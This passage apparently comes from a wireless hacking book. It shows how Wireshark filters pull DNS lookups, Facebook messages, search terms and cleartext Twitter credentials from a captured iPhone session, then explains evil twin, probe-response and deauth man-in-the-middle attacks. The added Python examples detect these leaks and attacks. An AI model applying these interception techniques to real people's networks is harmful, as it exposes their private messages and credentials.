The next thing I like to look at is the DNS request information. This can provide decent 
insight into what the device has at least attempted to connect to and what some of the installed apps 
may be. Since a device needs to look up the IP address of a domain name before it can connect to it, 
a DNS query is sent to the DNS server requesting that information. This allows us to use the 
display filter "dns.flags.response == 0" to show only those DNS queries. By taking a quick look 
at the next screenshot we can see that queries were made for hackersforcharity.org, wordpress.org, 
google.com, backtrack-linux.org, facebook.com, and so on. If we wanted to see all DNS queries 
and responses, we could simply use the "dns" display filter instead. 


[Screenshot: Wireshark packet list with display filter dns.flags.response == 0. Every row is a 
"Standard query A" from iPhone.local to 192.168.50.1, in order: a199.gi3.akamai.net, 
www.apple.com.akadns.net, a199.gi3.akamai.net, www.gstatic.com, www.hackersforcharity.org, 
lite.piclens.com, counters.gigya.com, wordpress.org, edge.quantserve.com, pixel.quantserve.com, 
www.l.google.com, www.backtrack-linux.org, ajax.googleapis.com, www.adobe.com, 
www-google-analytics.l.google.com, 0.channel65.facebook.com, a1814.g.akamai.net, 
api.facebook.com, and further queries for facebook.com hosts.] 


Now, if we go back and take a look at the screenshot of the Wireshark protocol hierarchy statistics, 
we can see that some eXtensible Markup Language (XML) was discovered. If we take a look at that 
information by applying the "xml" display filter in Wireshark, we can see what information 
we may be able to find. The next screenshot shows an example using this display filter and the 
type of information we can get. From this point there is another great feature built into Wireshark 
worth mentioning, called Export Selected Bytes. From this view we can highlight the XML section, 
right-click, and then select Export Selected Bytes. In this example it was saved to a file called 
"facebook.xml". From this view we can see that we have information containing the user ID, name, 
last name, and a link to the profile image of the Facebook users. 


[Screenshot: Wireshark with display filter xml, showing a frame from 66.220.146.22 to iPhone.local 
at 12:45:58, alongside Konqueror displaying /root/facebook.xml. The document is an 
<fql_query_response xmlns="http://api.facebook.com/1.0/" 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> whose <user> elements each carry 
<uid>, <name>, <last_name> and <pic_square> (a profile.ak.fbcdn.net image URL) for a dozen or so 
Facebook users. Bottom pane: Frame (1306 bytes), Uncompressed entity body (2538 bytes). Status bar: 
File: "/root/iphone-wep-01-dec.cap" 13 MB 00:36:54.] 
Follow TCP Stream is another very useful feature in Wireshark that can be used to quickly 
and easily view data spread over multiple segments. To use this feature, highlight a frame in the 
upper pane, right-click, and then select Follow TCP Stream. The output will be similar to that of 
the next screenshot. In this example we are now able to identify the iPhone application and version 
that is being used to communicate with iphone.facebook.com. 


Follow TCP Stream 

Stream Content 

POST /touch/thread.php HTTP/1.1 
Host: iphone.facebook.com 
Accept-Language: en-us 
Accept-Encoding: gzip, deflate 
Content-Length: 614 
Connection: keep-alive 

--3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f 


Now if we scroll down, as shown in the next screenshot, we can see what other information 
is contained in the TCP stream. We can quickly see that this contains a thread response for 
facebook.com. We are also able to see the date and time of the message, the ID and name of the 
message author, the link to their profile image, and the actual message that was sent. 


[Screenshot: Follow TCP Stream, scrolled down. After the closing multipart boundary 
--3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f-- the server answers HTTP/1.1 200 OK with 
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0; 
Expires: Sat, 01 Jan 2000 00:00:00 GMT; P3P: CP="DSP LAW"; Pragma: no-cache; a Set-Cookie: datr=... 
line; a Content-Type header with charset=utf-8; and X-Cnection: close. The body is 
<?xml version="1.0" encoding="UTF-8" ?><thread_response><thread tid="1163186293130" count="1"> 
<message mid="0" time="1253568903" ... body="..." unread="false"/></thread><user ... 
pic_square="http://profile.ak.fbcdn.net/..." .../></thread_response>, with the full text of a 
personal message readable in the body attribute. Entire conversation (2150 bytes).] 


Another use for "Follow TCP Stream" is to reconstruct web pages that have been viewed in the 
Safari browser installed on the iPhone. The next screenshot illustrates an example of what a web 
page may look like. This lets the hacker view the web page source code, and it may be possible 
to export this data to get a close resemblance of what the user actually viewed. How well this 
works depends on the way the website is designed: if the website is database driven, the exported 
page cannot query the database for its content and some pieces may be missing. In this example 
we are able to read the text content of the website and get a decent idea of what the web page 
is about. 
[Screenshot: Wireshark with display filter ip.addr eq 192.168.50.115 and ip.addr eq 174. ... and 
the Follow TCP Stream window showing the HTML source of the hackersforcharity.org page: the 
right column's "Donor Cloud" widget (donor links with amounts and dates), the JavaScript that 
validates the donation form (amount at least $10, website URL, link text), the "Donate, get linked, 
feed a child!" credits paragraph linking to the Kenya food for work program, and the PayPal donation 
form. One gap is marked "[1448 bytes missing in capture file]". Entire conversation (82791 bytes).] 


One of the most used features of the Internet is search engines like Google. It could be useful 
to find out what type of content the target is searching for on the Internet. Since Google uses a 
specific structure to build its search string, we can use that to build a display filter that shows 
us that information. One of the most useful display filters in Wireshark is the "frame contains" 
display filter. By creating the display filter [frame contains "/search?q="] we can quickly get a 
list of the search strings that were manually searched for by the iPhone user. In the next screenshot 
we can see that the user used Google to search for "hackers for charity" and "backtrack linux" 
on iPhone.local at IP address 192.168.50.115, along with the exact time the searches were conducted. 
We can imagine from this example how potentially valuable this type of information could be when 
gathering information about a targeted or untargeted user. 


[Screenshot: Wireshark with display filter frame contains "/search?q=". The packet list shows 
GET /search?q=... requests from iPhone.local to 64.233.169.104 at 12:28:41 and 12:30:38, followed 
by image requests (GET /images/... and GET /m/images/...), GET / HTTP/1.1 to hackersforcharity.org 
at 12:29:02 and GET / HTTP/1.1 to www.backtrack-linux.org at 12:30:55. Detail of Frame 133 
(857 bytes on wire): IEEE 802.11 Data; Logical-Link Control; Internet Protocol, Src: iPhone.local 
(192.168.50.115), Dst: 64.233.169.104; Transmission Control Protocol, Src Port: 49782, Dst Port: 
http (80), Len: 773; Hypertext Transfer Protocol with Request Method: GET, a request URI ending in 
ie=UTF-8&oe=UTF-8&hl=en&client=safari, Request Version: HTTP/1.1, User-Agent: Mozilla/5.0 
(iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) ..., 
and Accept: application/xml, application/xhtml+xml, text/html;q=0.9, text/plain;q=0.8, image/png, 
*/*;q=0.5.] 


The iPhone also includes the YouTube application installed by default. This allows users to 
watch YouTube videos directly on the iPhone over either the 3G or Wi-Fi connection. So the 
question would be, is it possible to find out what videos the user is watching? The answer is yes. 

In the next screenshot we can see the time that the user requested the .mp4 video from 
vl.cache7.googlevideo.com. Something to notice in this image is the "Partial Content" status and the 
"Content-Range" header. This tells us that the video is transferred in sections instead of in one 
continuous transmission. This is important because it means we would not be able to extract and 
re-create the video locally very easily. We would need to extract the hex data for each and every 
segment and use a hex editor to reconstruct the data in the correct order using the information in 
the "Content-Range" field. And, since this is a wireless network, there is a high chance that 100% 
of the transfer will not be captured. 

Even though it may be very difficult to carve the video file out of the network capture, we can 
still use the information contained in the stream to download the same video file the user viewed. 
To accomplish this, copy the Host value "vl.cache7.googlevideo.com" and paste it into the web 
browser. Next, copy the GET request path from the "/" all the way up to, but not including, the 
"HTTP/1.1". Now append that string to the host in the web browser and press Enter. All we are 
doing is taking the information in the stream and creating a direct link to the same video the 
iPhone user viewed, which can then be downloaded and saved locally. 


[Screenshot: Follow TCP Stream. Request: GET /videoplayback?id=...&itag=18&ip=0.0.0.0&ipbits=0 
&expire=...&sparams=id,itag,ip,ipbits,expire... HTTP/1.1; Host: vl.cache7.googlevideo.com; a 
Range: bytes=... header; Connection: close; User-Agent: Apple iPhone OS v3.1.2 CoreMedia 
v1.0.0.7011; Accept: */*; Accept-Encoding: identity. Response: HTTP/1.1 206 Partial Content, a 
Date header, Content-Range: bytes 2565004-2621439/16602574, Connection: close, 
Content-Disposition: attachment; filename=..., followed by binary MP4 data. Entire conversation 
(21482 bytes).] 


Another popular social networking site is Twitter. There are several apps available for the 
iPhone that make it much easier to send out your tweets and keep up to date with everyone you're 
following. So we are going to take a look at a couple of different iPhone Twitter apps to find out 
how applications with the same purpose can reveal very different information in their network 
traffic. We want to see what type of information we can or cannot find. 

The first iPhone Twitter app we are going to take a look at is called Echofon. The next screenshot 
illustrates the network capture for this application. The first thing we can take note of is 
the fact that this app uses port 443 (HTTPS) to secure the network traffic to and from the IP 
168.143.162.109 (Twitter.com). The traffic that is sent in the clear deals with polling the advertising 
server to pull the banner ad that is displayed at the top of the tweets. We can also see that this 
app is identified by the user agent as TwitterFon, which is what Echofon was previously named. 
Searching through the traffic did not uncover the name of the Twitter account, but it was possible 
to view the links to the profile images for the accounts of received tweets. 


Wireless Hacking 379 


[Screenshot: Wireshark, iphone-twitter-01-dec.cap (777 KB, 00:09:05, 1162 packets). The packet list 
shows RealiTeeCHK-2.local opening several connections to port 443 (https), each followed by a TLS 
Client Hello, plus a DNS standard query. The selected HTTP frame is 
GET /getInfo.php?appid=<app id>&uuid=<device uuid>&appver=200 HTTP/1.1 to Host: mob.adwhirl.com 
with User-Agent: TwitterFon/315 CFNetwork/459 Darwin/10.0.0d3 and Accept: */*; the hex pane shows 
the 802.11 and IP headers followed by the ASCII "GET /getInfo.php?appid=0b042..." request.] 


The next iPhone Twitter app we want to compare is called TweetDeck. With this app we see 
some of the same results and some different results compared to the previous app. Again we are 
able to view the links to the profile images of tweets received from Twitter.com. From the next 
screenshot we can see that the app identifies itself in the user agent field as TweetDeck 1.3 and 
that it updates its statuses over HTTP, not HTTPS as the previous app did. We can also see that the 
actual username and password credentials are passed in clear text. This can be quickly viewed by 
using the "http.authbasic" display filter in Wireshark. Both frame 941 and frame 943 transmit the 
user's credentials in the clear. 


[Screenshot: Wireshark, iphone-twitter-01-dec.cap, display filter http.authbasic. The selected frame 
is GET /statuses/mentions.xml?count=40&since_id=6067187603 HTTP/1.1 (Request Method: GET, 
Request Version: HTTP/1.1) with headers X-Twitter-Client-Version: 0.1, X-Twitter-Client-Url: nil, 
Accept: */* and Accept-Language: en-us; the frame matches the filter because it carries the user's 
HTTP Basic credentials. The hex pane ends with the ASCII "...ount=40&since_id=6067187603 HTTP/1.1".] 
Note: In the summer of 2010, Twitter changed the way it allows authentication to occur. Secure 
authentication is no longer an option; it is now mandatory. But this does prove one valid 
point: you can never operate under the assumption that anything is secure. 
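The two cleartext leaks the filters above surface, Google search strings via frame contains "/search?q=" and Basic credentials via http.authbasic, can also be checked for programmatically when auditing a capture of your own devices. The following Python is an added example, not code from the book or from Wireshark: it walks reassembled HTTP request text, the way Follow TCP Stream shows it, and reports the hosts contacted, the search terms, and any Basic credentials an app sent in the clear; the sample stream, host names and credentials are constructed for the example.

```python
"""Audit reassembled cleartext HTTP for the leaks the Wireshark filters above reveal.

Added example (not from the book or Wireshark). Input is the request side of a
TCP stream as Follow TCP Stream shows it; the sample stream is constructed.
"""
import base64
import binascii
from urllib.parse import parse_qs, urlsplit

METHODS = {"GET", "POST", "PUT", "HEAD", "DELETE"}


def split_requests(stream):
    """Split concatenated requests into (request_line, headers, body) tuples."""
    requests, pos = [], 0
    while pos < len(stream):
        end = stream.find("\r\n\r\n", pos)
        if end < 0:
            break                                   # incomplete header block
        lines = stream[pos:end].split("\r\n")
        req_line, headers = lines[0], {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0") or 0)
        body_start = end + 4
        body = stream[body_start:body_start + length]
        pos = body_start + length                   # skip the body, not just the headers
        if req_line.split(" ")[0] in METHODS:
            requests.append((req_line, headers, body))
    return requests


def search_terms(requests):
    """Google search strings, i.e. what the frame contains "/search?q=" filter finds."""
    terms = []
    for req_line, _, _ in requests:
        path = req_line.split(" ")[1]
        if "/search?q=" in path:
            terms.extend(parse_qs(urlsplit(path).query).get("q", []))  # decodes + and %xx
    return terms


def basic_credentials(requests):
    """(host, user, password) for every Basic header, as http.authbasic would show."""
    found = []
    for _, headers, _ in requests:
        scheme, _, token = headers.get("authorization", "").partition(" ")
        if scheme.lower() != "basic":
            continue
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue                                # malformed header, not credentials
        user, _, password = decoded.partition(":")
        found.append((headers.get("host", "?"), user, password))
    return found


def audit(stream):
    """Summarize what a passive observer of this cleartext stream could read."""
    reqs = split_requests(stream)
    return {"hosts": sorted({h.get("host", "") for _, h, _ in reqs}),
            "searches": search_terms(reqs),
            "basic_auth": basic_credentials(reqs)}


# Constructed sample stream: hosts, search string and credentials are made up.
SAMPLE_STREAM = (
    "GET /search?q=hackers+for+charity&ie=UTF-8&client=safari HTTP/1.1\r\n"
    "Host: www.google.com\r\n"
    "User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us)\r\n"
    "\r\n"
    "GET /statuses/mentions.xml?count=40 HTTP/1.1\r\n"
    "Host: twitter.example\r\n"
    "Authorization: Basic " + base64.b64encode(b"alice:hunter2").decode() + "\r\n"
    "User-Agent: TweetDeck 1.3\r\n"
    "\r\n"
    "POST /touch/thread.php HTTP/1.1\r\n"
    "Host: iphone.facebook.example\r\n"
    "Content-Length: 11\r\n"
    "\r\n"
    "x=1&y=hello"
)

if __name__ == "__main__":
    for key, value in audit(SAMPLE_STREAM).items():
        print(f"{key}: {value}")
```

Anything this reports for a real app is data that should be moving over TLS instead; an empty report for the app's API hosts is the result you want.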


Example Scenario: "Man in the Middle" 


Bob walks into his local coffee shop, a place he has been many times before. He fires up his lap- 
top and logs into Windows as he sips his latte. His laptop reports that there is wireless Internet 
access in the area via a pop-up in the system tray, so he brings up the wireless manager and 
selects an access point with the coffee shop name and clicks Connect. The laptop connects and 
he brings up his browser, checks his email and begins to surf the web. Moments later his email 
client kicks him out and he is unable to log back in. The web page error says his password is no 
longer valid. Bob sits there very confused not sure what has happened but continues to surf the 
web as he contemplates what just happened. A pretty typical story, really; it happens every day 
in some form or another because these types of attacks are so easy to execute. What happened 
behind the scenes, though, is anything but typical. Bob was a victim of a man-in-the-middle 
attack and had no idea. 

Let's rewind a bit and look at what really happened. While Bob was ordering his coffee, 
Eve, a local hacker, decided to go out and have some fun. She fired up her laptop and plugged in 
two USB wireless cards, giving her three in total, including the one built into her laptop. She started 
a fake access point program, turning one wireless card into an access point not only with the same 
name as the coffee shop AP, but also with a stronger signal. Next, Eve connected to the real access 
point and bridged that connection to her fake AP. This ensured that anyone who connected to 
her fake access point would still get access to the Internet. With the third wireless card she set up a 
client control tool that prevented wireless clients in the area from connecting to the real access point. 
While Bob was surfing the Internet through Eve's rogue access point, Eve was inspecting all of 
Bob's traffic and pulling out the passwords. Once she had his email password she simply logged 
in and changed it to "MITMROCKs!" When Eve had what she wanted, she simply shut down her 
laptop, packed up, and walked out. Bob's laptop quickly reconnected to the real AP and, other 
than a very brief interruption in the connection, Bob was none the wiser and was left scratching 
his head as to what had happened. 

Before we go into a detailed explanation of wireless man-in-the-middle attacks, a few terms 
must be defined. 


■ ESSID: Short for extended service set identifier; this is the name of the access point. Several 
common examples are MSHOME, Linksys, and Tsunami. It is quite common for multiple access 
points to have the same ESSID. 

■ BSSID: Short for basic service set identifier; this is the layer 2 MAC address that the wireless 
card associates with. Each access point has its own BSSID. 

■ MITM: Short for man-in-the-middle attack; an attack in which network traffic is passed 
through the attacker's system or program to be read or modified at their choosing. 

■ Monitor mode: A state in which a wireless card receives any 802.11 packets on the air and 
allows them to be stored to a pcap file or used by a program. 

■ Injection: A feature of some wireless cards by which they can broadcast packets into the 
airwaves without needing to be associated with an access point. This is useful for spoofing packets. 

■ Deauthentication packet: An 802.11 management packet that causes the client or access point 
to break an authenticated connection. These packets are also referred to as deauth packets. 

■ Beacon packet: A packet that is typically sent several times a second advertising a wireless 
network, its ESSID, BSSID, and encryption/service level. 

■ BSS: Short for basic service set; an access point and all of its associated clients are referred to 
as a BSS. 

■ ESS: Short for extended service set; a group of access points with the same name covering a 
large area such as an entire building. 

■ Rogue AP: An access point that is not authorized to be on a given network. 

■ Evil twin: An access point that is configured to look just like another, legitimate access point. 


The concept of a man-in-the-middle attack is relatively simple, the goal being to place yourself 
in the middle of some sort of conversation or data exchange. This gives you control over what gets 
passed on and in what form, or the ability to copy all of the data in transit. From this point on 
we will refer to man-in-the-middle attacks as MITM, which has become an industry-standard 
abbreviation. Wireless networks lend themselves very well to MITM attacks because of the way the 
802.11 protocol is written. The protocol makes it very hard to determine which access point you 
are connected to. This is because when you tell your wireless card to associate with an ESSID, 
that ESSID could be any one of a number of access points connected in a group. Groups of access 
points with the same ESSID are referred to as an ESS. ESSs are used to improve coverage, 
throughput, and the number of clients that can be handled. This becomes a problem because 
the clients must blindly trust the access points. The ESS feature is great from an attacker's 
standpoint because it is very easy to set up an evil twin access point that looks like it belongs to 
a legitimate ESS. 

In a MITM attack you are not really attacking the access point; you are actually attacking the 
client. This is because you want the client to associate with an access point or network under your 
control. There are several ways to do this: abusing probe requests, setting up an evil twin 
access point with a stronger signal and hoping that a client will connect, or using targeted deauths 
to give the client no choice but to talk to you. 
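The first two client-side vectors listed above, probe-request abuse and the evil twin, leave signatures in the 802.11 management frames a monitor-mode card can see. The following Python is an added example and not code from the book: it parses raw management frames, records which SSIDs each client probes for (the preferred-network-list leak), flags beacons or probe responses for a defended ESSID from a BSSID not on the authorized list (evil twin), and flags any AP that answers probes for several different SSIDs (the rogue "answer everything" behaviour). All MAC addresses, SSIDs and the authorized-BSSID table are constructed for the example.

```python
"""Detect evil twin APs and probe-request abuse in raw 802.11 management frames.

Added example (not from the book). Frames are the raw bytes a monitor-mode
card delivers, without a radiotap header; every sample below is constructed.
"""
from collections import defaultdict

PROBE_REQ, PROBE_RESP, BEACON = 4, 5, 8      # management frame subtypes
SSID_TAG, DS_PARAM_TAG = 0, 3                 # tagged parameter IDs (SSID, channel)


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt_frame(frame):
    """Return addresses, SSID and channel of a management frame, or None."""
    if len(frame) < 24:                       # shorter than the MAC header
        return None
    fc = frame[0]
    ftype, subtype = (fc >> 2) & 0x3, fc >> 4
    if ftype != 0:                            # only management frames (type 0)
        return None
    da, sa, bssid = (mac_str(frame[o:o + 6]) for o in (4, 10, 16))
    body = frame[24:]
    if subtype in (BEACON, PROBE_RESP):       # skip timestamp(8)+interval(2)+caps(2)
        body = body[12:]
    tags, pos = {}, 0
    while pos + 2 <= len(body):               # walk the tagged parameters
        tag_id, tag_len = body[pos], body[pos + 1]
        value = body[pos + 2:pos + 2 + tag_len]
        if len(value) < tag_len:              # truncated frame: stop cleanly
            break
        tags.setdefault(tag_id, value)
        pos += 2 + tag_len
    ssid = tags.get(SSID_TAG, b"").decode("utf-8", "replace")
    ds = tags.get(DS_PARAM_TAG, b"")
    channel = ds[0] if len(ds) == 1 else None
    return {"subtype": subtype, "da": da, "sa": sa, "bssid": bssid,
            "ssid": ssid, "channel": channel}


def build_frame(subtype, sa, bssid, ssid, channel=None, da=b"\xff" * 6):
    """Assemble a minimal management frame (used here only to build samples)."""
    header = bytes([subtype << 4, 0]) + b"\x00\x00" + da + sa + bssid + b"\x00\x00"
    fixed = b"\x00" * 12 if subtype in (BEACON, PROBE_RESP) else b""
    tags = bytes([SSID_TAG, len(ssid)]) + ssid.encode()
    if channel is not None:
        tags += bytes([DS_PARAM_TAG, 1, channel])
    return header + fixed + tags


def analyze(frames, authorized):
    """authorized maps each defended ESSID to the set of BSSIDs allowed to serve it.

    Returns (client -> SSIDs it probed for, evil twins seen as (ssid, bssid, channel),
    BSSIDs that answered probes for more than one SSID).
    """
    probes, answers, twins = defaultdict(set), defaultdict(set), set()
    for frame in frames:
        p = parse_mgmt_frame(frame)
        if p is None:
            continue
        if p["subtype"] == PROBE_REQ and p["ssid"]:   # directed probe leaks the PNL
            probes[p["sa"]].add(p["ssid"])
        elif p["subtype"] in (BEACON, PROBE_RESP):
            if p["ssid"] in authorized and p["bssid"] not in authorized[p["ssid"]]:
                twins.add((p["ssid"], p["bssid"], p["channel"]))
            if p["subtype"] == PROBE_RESP:
                answers[p["bssid"]].add(p["ssid"])
    many_ssids = sorted(b for b, ssids in answers.items() if len(ssids) > 1)
    return {c: sorted(s) for c, s in probes.items()}, sorted(twins), many_ssids


# Constructed sample: one client, one legitimate AP and one rogue AP (MACs made up).
CLIENT = bytes.fromhex("020000000001")
LEGIT_AP = bytes.fromhex("02aabbccdd01")
ROGUE_AP = bytes.fromhex("02aabbccdd99")
AUTHORIZED = {"Brewsters Coffee": {mac_str(LEGIT_AP)}}
SAMPLE_FRAMES = [
    build_frame(PROBE_REQ, CLIENT, b"\xff" * 6, "Brewsters Coffee"),
    build_frame(PROBE_REQ, CLIENT, b"\xff" * 6, "linksys"),
    build_frame(PROBE_REQ, CLIENT, b"\xff" * 6, ""),                 # broadcast probe
    build_frame(BEACON, LEGIT_AP, LEGIT_AP, "Brewsters Coffee", 6),
    build_frame(BEACON, ROGUE_AP, ROGUE_AP, "Brewsters Coffee", 11),  # evil twin
    build_frame(PROBE_RESP, ROGUE_AP, ROGUE_AP, "linksys", 11, da=CLIENT),
    build_frame(PROBE_RESP, ROGUE_AP, ROGUE_AP, "Brewsters Coffee", 11, da=CLIENT),
]

if __name__ == "__main__":
    probed, twins, many = analyze(SAMPLE_FRAMES, AUTHORIZED)
    print("SSIDs probed for, per client:", probed)
    print("evil twins (ssid, bssid, channel):", twins)
    print("APs answering probes for several SSIDs:", many)
```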

When it comes to targeting clients for MITM attacks, we first need to understand how the 
clients behave so that we can respond to them and manipulate them into joining the networks 
under our control. Due to their large market share we are going to look at Windows client probe 
request behavior. A probe request is a request that the computer's wireless client sends out for each 
of the wireless networks it has connected to in the past. These requests broadcast the network 
name and ask whether that network is nearby. This behavior opens up an interesting avenue of 
attack for the wireless hacker: by responding to these probe requests it is very easy to convince a 
client to connect to your access point. This changed when Microsoft released KB 917021, which 
was an attempt to make client probe request behavior more secure. This KB has since been rolled 
into Service Pack 3; it works by passively listening for access point beacons and then responding 
only if the access point is in the preferred network list. In this way computers still know what 
networks are around them and can still connect to preferred networks automatically, but they aren't 
quite as vulnerable to a simple MITM attack as they were before. Or at least this is how the update 
was supposed to work. When the Microsoft Zero Config client creates a profile, it selects the "Connect 
even if this network is not broadcasting" check box by default. The following screenshot shows an 
example of a common wireless profile configuration. Here you can see the default settings applied 
by Microsoft. 
[Screenshot: Wireless network properties dialog. Network name (SSID): Brewsters Coffee; 
"Connect even if this network is not broadcasting" checked; Network Authentication: WPA2; 
Data encryption: AES; "This is a computer-to-computer (ad hoc) network" unchecked.] 
This check box exists to allow a client to connect to a network that is not sending out beacons. 
This configuration of wireless network is normally called a hidden ESSID. The wireless client 
determines whether these networks are around by sending out probe requests and listening to see if 
the network responds. If we couple this with the fact that all Windows wireless profiles are 
configured to autoconnect by default, we realize that nothing has changed. Microsoft has rendered 
this update and new client behavior quite ineffective through its default settings and leaves its 
clients open to rogue probe-response attacks. The first public tool using this attack was the Karma 
tool. It used modified Madwifi-ng drivers to create an access point that would respond to all probe 
requests with the correct probe response. In this way the client thought it was talking to a 
network in its preferred network list and would autoconnect. This is very effective at collecting 
clients. A more advanced version of this tool is airbase-ng, part of the aircrack-ng suite. 
Airbase-ng is a software-based approach that uses a wireless card in monitor mode and packet 
injection to create an AP that will respond to the probe requests. Airbase-ng, while easier to use 
and supporting more wireless card types, does not work quite as well as Karma, because it is a 
software-based AP and the timing needed for a robust access point is not quite there. It is still 
under development and should improve in the future. It is important to note that Windows Vista and 
Windows 7 clients behave the same way as each other, but their probe request behavior differs from 
the Windows XP (Zero Config) behavior described above: profiles that are created still have the 
options to autoconnect and to connect to a network that is not broadcasting; however, only 
autoconnect is enabled by default. It should also be noted that Microsoft machines are not the only 
clients vulnerable to these attacks. Some older Apple Mac clients as well as many modern cell 
phones will happily send out probe requests looking for the networks to which they commonly 
connect. 
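To see which saved profiles on a client are exposed to the probe-response problem described above, here is an added Python example (not code from the book) that parses the XML `netsh wlan export profile` writes and flags a profile that is set both to auto-connect and to connect to a non-broadcasting network. The profile text is constructed, and the `assess_profile` and `flag_profiles` names are mine.

```python
"""Check exported Windows WLAN profiles for the risky default the chapter
describes: auto-connect combined with "connect even if this network is not
broadcasting", which makes the client probe for the SSID by name.
Added example, not code from the book; the XML layout is the one written by
`netsh wlan export profile`, and the profile text below is constructed."""
import xml.etree.ElementTree as ET

NS = {"p": "http://www.microsoft.com/networking/WLAN/profile/v1"}

# Constructed sample: a WPA2/AES profile saved with the defaults shown in
# the chapter's screenshot (the hex element is the ASCII bytes of the SSID).
SAMPLE_PROFILE = """<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>Brewsters Coffee</name>
  <SSIDConfig>
    <SSID>
      <hex>42726577737465727320436F66666565</hex>
      <name>Brewsters Coffee</name>
    </SSID>
    <nonBroadcast>true</nonBroadcast>
  </SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>auto</connectionMode>
  <MSM>
    <security>
      <authEncryption>
        <authentication>WPA2PSK</authentication>
        <encryption>AES</encryption>
        <useOneX>false</useOneX>
      </authEncryption>
    </security>
  </MSM>
</WLANProfile>
"""


def assess_profile(xml_text):
    """Return the profile's settings plus a list of findings (empty = fine)."""
    root = ET.fromstring(xml_text)

    def field(path):
        el = root.find(path, NS)
        return (el.text or "").strip() if el is not None else ""

    auto = field("p:connectionMode").lower() == "auto"
    hidden = field("p:SSIDConfig/p:nonBroadcast").lower() == "true"
    auth = field("p:MSM/p:security/p:authEncryption/p:authentication")
    findings = []
    if auto and hidden:
        # The client sends probe requests naming this SSID whenever it is not
        # connected, so anything that answers them looks like a preferred net.
        findings.append("probes for SSID by name while disconnected")
    if auth.lower() == "open":
        # No key: a same-name rogue AP is joined with nothing to verify.
        findings.append("open network: same-name AP accepted without a key")
    return {"name": field("p:name"), "autoconnect": auto,
            "non_broadcast": hidden, "authentication": auth,
            "findings": findings}


def flag_profiles(xml_texts):
    """Names of the profiles that have at least one finding."""
    return [r["name"] for r in map(assess_profile, xml_texts) if r["findings"]]
```

Clearing the non-broadcast flag (or switching the profile to manual connection) empties the findings list, which is the fix the chapter's reasoning points at.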

Even though manufacturers have made attempts to secure the preferred network lists, it is still 
quite easy to convince clients to connect to a rogue or evil twin access point. This is accomplished 
by setting up an access point with the same name and making sure it is either closer to the clients 
or is putting out a better, cleaner signal than the real access point. Upon noticing a stronger signal, 
some clients will automatically switch to it while others require a bit more convincing. This works 
because of another feature of wireless clients, the background scan: even when connected to an 
access point, clients are always searching in the background for a better access point. The 
programming logic behind why a client might switch is complicated and depends on many factors, 
so there are much easier ways to get a client to connect to you. A common attack is to send out a 
broadcast deauth packet, spoofed from the access point, to all clients telling them to disconnect. 
The hope here is that the clients will disconnect and reconnect to your evil access point. 
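From the defender's side, the deauth burst just described is easy to spot in a monitor-mode capture. The following added example (not from the book) decodes the 802.11 management frame header, counts deauthentication/disassociation frames per transmitter inside a sliding window, and flags a burst, noting whether it was addressed to broadcast. The frame bytes and timestamps are constructed, and the `parse_mgmt` and `detect_deauth_floods` names are mine.

```python
"""Spot the deauth burst the chapter describes, broadcast deauth/disassoc
frames carrying the legitimate AP's address, in captured 802.11 frames.
Added example, not code from the book. Frames are the raw 802.11 header as a
monitor-mode capture hands them over (no radiotap); samples are constructed."""
import struct
from collections import defaultdict, deque

DEAUTH, DISASSOC = 0xC, 0xA       # management frame subtypes
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_mgmt(raw):
    """Decode the fixed header of an 802.11 management frame, else None."""
    if len(raw) < 24:
        return None
    fc, _dur, a1, a2, a3, _seq = struct.unpack("<HH6s6s6sH", raw[:24])
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 0:                # only management frames carry deauths
        return None
    frame = {"subtype": subtype, "addr1": mac(a1), "addr2": mac(a2),
             "bssid": mac(a3), "reason": None}
    if subtype in (DEAUTH, DISASSOC) and len(raw) >= 26:
        frame["reason"] = struct.unpack("<H", raw[24:26])[0]
    return frame


def detect_deauth_floods(frames, window=5.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_bytes). Alert once per
    transmitter that sends >= threshold deauth/disassoc frames inside
    `window` seconds, noting whether any of them were broadcast."""
    recent, bcast = defaultdict(deque), defaultdict(bool)
    alerted, alerts = set(), []
    for ts, raw in frames:
        f = parse_mgmt(raw)
        if f is None or f["subtype"] not in (DEAUTH, DISASSOC):
            continue
        src, q = f["addr2"], recent[f["addr2"]]
        q.append(ts)
        while ts - q[0] > window:     # drop frames outside the window
            q.popleft()
        bcast[src] |= f["addr1"] == BROADCAST
        if len(q) >= threshold and src not in alerted:
            alerted.add(src)
            alerts.append({"transmitter": src, "count": len(q),
                           "broadcast": bcast[src], "reason": f["reason"]})
    return alerts


# Constructed sample capture using the chapter's Brewsters Coffee BSSID. A
# MAC alone cannot prove spoofing, but a real AP has no reason to deauth
# everyone over and over, so the burst itself is the signal.
BEACON = bytes.fromhex("80000000" "ffffffffffff" "000f668e6fcc"
                       "000f668e6fcc" "2000" "0000000000000000" "6400" "1104")
UNICAST_DEAUTH = bytes.fromhex("c0003a01" "0018de0918f4" "000f668e6fcc"
                               "000f668e6fcc" "1000" "0200")  # reason 2
BCAST_DEAUTH = bytes.fromhex("c0003a01" "ffffffffffff" "000f668e6fcc"
                             "000f668e6fcc" "1000" "0700")    # reason 7
SAMPLE_CAPTURE = [(0.0, BEACON), (0.1, UNICAST_DEAUTH)] + [
    (10.0 + 0.2 * i, BCAST_DEAUTH) for i in range(8)]
```

A single unicast deauth, which an AP legitimately sends, never trips the threshold; the eight broadcast frames within two seconds do.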

Now that we have some basic terms defined and understand some wireless attacks and client 
behavior, let's dig in to what really happened in our initial attack scenario. Eve used airbase-ng as 
her evil access point. Airbase-ng, being a software-based access point, will work with any wireless 
